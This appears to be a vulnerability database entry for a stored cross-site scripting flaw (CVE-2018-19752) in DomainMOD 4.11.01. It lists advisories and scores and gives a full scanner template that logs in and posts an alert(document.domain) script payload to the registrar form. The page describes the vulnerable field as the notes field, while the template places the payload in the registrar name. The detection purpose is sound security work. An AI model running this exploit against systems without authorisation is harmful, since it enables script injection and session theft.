DomainMOD 4.11.01 - Cross-Site Scripting

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType

DomainMOD 4.11.01 - Cross-Site Scripting vulnerability via assets/add/registrar.php notes field for Registrar. Exploitation allows execution of arbitrary JavaScript code in victim's browser leading to session hijacking, defacement, or theft of sensitive information

Reporter	Title	Published	Views	Family All 11
0day.today	DomainMOD 4.11.01 - Registrar Cross-Site Scripting Vulnerability	4 Dec 201800:00	–	zdt
CVE	CVE-2018-19752	29 Nov 201822:00	–	cve
Cvelist	CVE-2018-19752	29 Nov 201822:00	–	cvelist
Exploit DB	DomainMOD 4.11.01 - Registrar Cross-Site Scripting	4 Dec 201800:00	–	exploitdb
EUVD	EUVD-2018-11436	7 Oct 202500:30	–	euvd
exploitpack	DomainMOD 4.11.01 - Registrar Cross-Site Scripting	4 Dec 201800:00	–	exploitpack
NVD	CVE-2018-19752	29 Nov 201822:29	–	nvd
OpenVAS	DomainMOD < 4.12.0 Multiple Vulnerabilities	22 Jan 201900:00	–	openvas
Packet Storm	DomainMOD 4.11.01 Cross Site Scripting	5 Dec 201800:00	–	packetstorm
Packet Storm	DomainMOD 4.11.01 Registrar Cross Site Scripting	26 Feb 201900:00	–	packetstorm

Source	Link
github	www.github.com/domainmod/domainmod/issues/84
exploit-db	www.exploit-db.com/exploits/45949/
nvd	www.nvd.nist.gov/vuln/detail/CVE-2018-19752
github	www.github.com/ARPSyndicate/kenzer-templates

id: CVE-2018-19752

info:
  name: DomainMOD 4.11.01 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://github.com/domainmod/domainmod/issues/84
    - https://www.exploit-db.com/exploits/45949/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2018-19752
    cwe-id: CWE-79
    epss-score: 0.03316
    epss-percentile: 0.86963
    cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: domainmod
    product: domainmod
  tags: cve2018,cve,domainmod,xss,authenticated,edb,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_username={{username}}&new_password={{password}}
      - |
        POST /assets/add/registrar.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test
      - |
        GET /assets/registrars.php HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script></a>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022056ae88395c2660f86a92477f65af80f27ed8b6fb1e7f8d6936aca49e3d89f6ce022100c38ddeb828f7958c79d988df147539e32a56bfd8c1bd548093bcd36244fa04fc:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

5.5Medium risk

Vulners AI Score5.5

CVSS 23.5

CVSS 34.8

EPSS0.03316